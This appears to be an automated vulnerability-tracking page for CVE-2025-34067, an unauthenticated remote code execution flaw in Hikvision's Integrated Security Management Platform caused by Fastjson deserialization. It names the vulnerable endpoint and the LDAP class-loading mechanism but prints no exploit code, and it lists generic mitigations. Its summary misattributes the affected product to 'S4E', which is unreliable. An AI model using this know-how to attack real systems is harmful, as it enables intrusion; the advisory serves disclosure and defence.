Cyber Resilience

CVE-2025-34067

CriticalPublic PoCRCE

Published: 02 July 2025

Published
02 July 2025
Modified
15 April 2026
KEV Added
Patch
CVSS Score v4 10.0 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0842 92.5th percentile
Risk Priority 25 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-34067 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability in S4E (inferred from references). Its CVSS base score is 10.0 (Critical).

Operationally, ranked in the top 7.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

CVE-2025-34067 is an unauthenticated remote code execution flaw in the applyCT component of the Hikvision Integrated Security Management Platform. The vulnerability stems from the component's use of a vulnerable Fastjson library version; the endpoint /bic/ssoService/v1/applyCT accepts and deserializes untrusted user input, enabling Fastjson's auto-type feature to load arbitrary Java classes referenced through an LDAP URL.

An attacker with network access can send a crafted request to the endpoint that triggers class loading and achieves arbitrary command execution on the underlying system. No authentication or user interaction is required, and the CVSS 4.0 score of 10.0 reflects the full impact across confidentiality, integrity, and availability.

Exploitation evidence was recorded by the Shadowserver Foundation on 2025-02-05 UTC. The EPSS score has remained flat at a peak of 0.0842 with no material increase since disclosure. Public references, including detailed write-ups on GitHub and advisories from VulnCheck and S4E, document the issue but do not specify vendor patches or configuration mitigations in the available sources.

EU & UK References

Vulnerability details

An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker…

more

to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

S4E
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-502

Penetration testing supplies malicious serialized objects, detecting unsafe deserialization and supporting corrective actions.

addresses: CWE-502

Evaluation of untrusted data handling (deserialization testing) reveals unsafe processing, which the required remediation process addresses.

addresses: CWE-502

Untrusted serialized data can be deserialized and observed inside the chamber, blocking gadget-chain exploitation outside the sandbox.

addresses: CWE-502

Validates or rejects untrusted serialized data before deserialization occurs.

addresses: CWE-502

Identifies and blocks malicious code introduced through deserialization of untrusted data at system boundaries.

addresses: CWE-502

Integrity verification of serialized information can detect tampering before deserialization occurs.

addresses: CWE-502

Provenance of associated data allows detection of untrusted sources before deserialization or processing occurs.

References